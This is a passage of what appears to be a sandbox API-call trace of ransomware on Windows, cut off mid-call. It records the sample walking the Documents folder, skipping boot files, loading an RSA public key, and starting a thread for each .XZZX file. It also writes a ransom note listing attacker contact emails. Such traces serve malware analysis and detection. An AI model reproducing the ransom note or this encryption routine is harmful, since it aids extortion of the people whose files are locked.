lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1148 [0231.697] Sleep (dwMilliseconds=0x96) [0231.852] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.852] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.852] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.852] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.853] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.853] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.853] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.853] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0231.853] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0231.853] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0231.853] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0231.853] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0231.853] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0231.853] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0231.853] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0231.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.853] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.853] SetErrorMode (uMode=0x1) returned 0x1 [0231.853] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT") returned 61 [0231.853] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0231.853] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0231.853] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x114c) returned 0x0 [0231.854] RegQueryValueExW (in: hKey=0x114c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d3d68, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43d3d68*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0231.854] RegCloseKey (hKey=0x114c) returned 0x0 [0231.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0231.854] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0231.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x114c [0231.854] CloseHandle (hObject=0x114c) returned 1 [0231.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0231.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0231.854] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0231.854] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0231.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0231.854] SetErrorMode (uMode=0x1) returned 0x1 [0231.854] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0231.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0231.854] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0231.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0231.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0231.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0231.855] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0231.855] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.855] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntldr") returned 0x0 [0231.855] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTLDR") returned 0x0 [0231.855] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.855] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.855] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0231.855] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0231.855] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0231.855] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.855] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0231.855] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0231.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1154 [0231.855] Sleep (dwMilliseconds=0x96) [0232.008] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.008] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2="..") returned 1 [0232.008] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2=".") returned 1 [0232.008] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.008] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntldr") returned 0x0 [0232.008] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTLDR") returned 0x0 [0232.009] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.009] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.009] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.009] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.009] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.009] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.009] lstrcpyW (in: lpString1=0x17be7c, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0232.009] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1158 [0232.009] Sleep (dwMilliseconds=0x96) [0232.165] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.165] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2="..") returned 1 [0232.165] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2=".") returned 1 [0232.165] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.165] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntldr") returned 0x0 [0232.165] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTLDR") returned 0x0 [0232.165] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.165] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.165] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.165] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.165] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.165] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.165] lstrcpyW (in: lpString1=0x17be7c, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0232.165] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x115c [0232.166] Sleep (dwMilliseconds=0x96) [0232.320] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.320] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2="..") returned 1 [0232.320] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2=".") returned 1 [0232.321] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.321] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntldr") returned 0x0 [0232.321] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTLDR") returned 0x0 [0232.321] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.321] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.321] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.321] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.321] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.321] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.321] lstrcpyW (in: lpString1=0x17be7c, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0232.321] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1160 [0232.321] Sleep (dwMilliseconds=0x96) [0232.476] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.476] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2="..") returned 1 [0232.476] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2=".") returned 1 [0232.476] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.476] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntldr") returned 0x0 [0232.476] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTLDR") returned 0x0 [0232.477] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.477] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.477] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.477] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.477] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.477] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.477] lstrcpyW (in: lpString1=0x17be7c, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0232.477] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, 